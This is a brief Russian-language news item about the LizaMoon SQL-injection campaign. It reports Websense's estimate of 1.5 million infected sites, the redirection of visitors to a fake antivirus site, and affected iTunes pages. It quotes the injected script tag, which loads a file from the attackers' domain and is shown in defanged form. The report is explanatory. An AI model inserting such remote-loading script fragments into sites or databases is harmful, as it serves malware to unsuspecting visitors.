Хакеры внедряют код на языке SQL в ссылки страниц и перенаправляют пользователей на фальшивый сайт.
Более 1,5 млн сайтов по всему миру заразились в результате атаки вирусом, который встраивает в URL ссылки на вредоносный файл, пишет BFM. Такова предварительная оценка масштабов атаки типа «SQL-внедрение», которую провели специалисты Websense Security. Эта американская лаборатория впервые заметила вредоносные файлы 29 марта.
Внедряемый файл меняет текстовые поля в базе данных и внедряет в них дополнительный фрагмент <sсript src=hxxp://lizamoon.com/ur.php></sсript>, который загружает с удаленного сервера вредоносную программу. Затем пользователей направляли сайт с фальшивыми антивирусными утилитами под названием Windows Stability Center. С него предлагалось за деньги загрузить антивирусное ПО. Microsoft отношения к этому сайту не имеет. Websense Security перечисляет несколько адресов с вредоносным файлом, на которые направляют пользователей.
Атака названа по имени вредоносного кода, который загружается в ссылки, — LizaMoon.
Специалисты Websense разглядели вредоносный код, в частности, на некоторых страниц музыкального магазина iTunes от компании Apple.